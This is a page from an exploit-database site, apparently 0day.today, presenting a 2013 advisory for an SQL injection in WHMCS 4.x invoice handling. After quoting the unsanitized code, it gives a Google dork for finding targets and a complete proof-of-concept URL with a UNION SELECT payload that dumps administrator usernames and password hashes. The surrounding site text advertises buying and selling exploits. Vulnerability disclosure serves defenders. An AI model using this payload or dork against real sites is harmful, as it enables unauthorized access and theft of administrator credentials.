0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WHMCS 4.x SQL Injection Vulnerability
# Title: WHMCS 4.x SQL Injection Vulnerability # Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php" # Author: Ahmed Aboul-Ela # Contact: Ahmed.Aboul3la[at]gmail[dot]com # Date: 14/5/2013 # Vendor: http://www.whmcs.com # Version: 4.5.2 and perior versions should be affected too # Tested on: Linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sql Injection Vulnerability in "/includes/invoicefunctions.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Vulnerable Code Snippet : LINE 582: function pdfInvoice($id) LINE 583: { LINE 686: if ($CONFIG['GroupSimilarLineItems']) LINE 687: { LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC'); LINE 689: } As we can see here the $id argument of pdfInvoice function have been used directly at mysql query without any sanitization which leads directly to Sql Injection It appears that pdfInvoice function is being called at "/dl.php" file as the following: LINE 21: if ($type == 'i') LINE 22: { LINE 23: $result = select_query('tblinvoices', '', array( LINE 24: 'id' => $id LINE 25: )); LINE 26: $data = mysql_fetch_array($result); LINE 27: $invoiceid = $data['id']; LINE 28: $invoicenum = $data['invoicenum']; LINE 29: $userid = $data['userid']; LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid)) LINE 31: { LINE 32: downloadLogin(); LINE 33: } LINE 34: if (!$invoicenum) LINE 35: { LINE 36: $invoicenum = $invoiceid; LINE 37: } LINE 38: require('includes/clientfunctions.php'); LINE 39: require('includes/countries.php'); LINE 40: require('includes/invoicefunctions.php'); LINE 41: require('includes/tcpdf.php'); LINE 42: $pdfdata = pdfInvoice($id); LINE 43: header('Pragma: public'); LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private'); LINE 47: header('Cache-Control: private', false); LINE 48: header('Content-Type: application/octet-stream'); LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"'); LINE 50: header('Content-Transfer-Encoding: binary'); LINE 51: echo $pdfdata; LINE 52: exit(); LINE 53: return 1; LINE 54: } As we can see at LINE "42" the pdfInvoice function have been called and passed $id Variable without any sanitization Afterwards it force the browser to download the generated invoice in PDF format - Proof of Concept for Exploitation To Dump Administrator Credentials (user & pass): http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins -- ~ Result: The Browser will prompt download for the pdf invoice file after opening it you should find the username and pw hash there :) - Precondition to Successfully Exploit the Vulnerability: "Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default ) - Credits: Ahmed Aboul-Ela - Information Security Consultant @ Starware Group # 0day.today [2024-12-25] #